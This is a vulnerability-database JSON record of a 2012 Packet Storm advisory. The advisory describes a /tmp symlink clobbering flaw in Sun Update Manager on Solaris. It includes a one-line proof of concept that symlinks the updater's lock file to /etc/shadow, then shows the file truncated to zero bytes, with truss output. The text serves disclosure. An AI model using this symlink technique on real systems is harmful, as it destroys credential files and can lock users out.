{"id": "PACKETSTORM:114908", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Sun Update Manager /tmp Clobber", "description": "", "published": "2012-07-20T00:00:00", "modified": "2012-07-20T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/114908/Sun-Update-Manager-tmp-Clobber.html", "reporter": "Larry W. Cashdollar", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:22:59", "viewCount": 8, "enchantments": {"score": {"value": -0.2, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.2}, "sourceHref": "https://packetstormsecurity.com/files/download/114908/sunum-clobber.txt", "sourceData": "`(author http://packetstormsecurity.org/user/lcashdol/)\ufeff \n \n \nNoticed this during routine patching. \n \n/tmp file clobbering vulnerability in Sun Update manager. \n7/15/2012 \n \nnoticed this while patching my lab solaris system tonight. \n \nlarry@s0l4r1s:/tmp$ ln -s /etc/shadow com.sun.swup.client.LOCK \n \nupdatemanager is run \n \nlarry@n1caragua:/tmp$ ls -l /etc/shadow \n-r-------- 1 root sys 0 Jul 19 18:49 /etc/shadow \n \nSunOS s0l4r1s 5.10 Generic_147441-19 i86pc i386 i86pc \nlarry@n1caragua:~$ \n \ntruss output: \n \n4841/2: stat64(\"/tmp/com.sun.swup.client.LOCK\", 0xD03FEAB0) = 0 \n4841/2: open64(\"/tmp/com.sun.swup.client.LOCK\", O_WRONLY|O_CREAT|O_TRUNC, 0666) = 5 \n \n \n`\n", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647371884}}

{}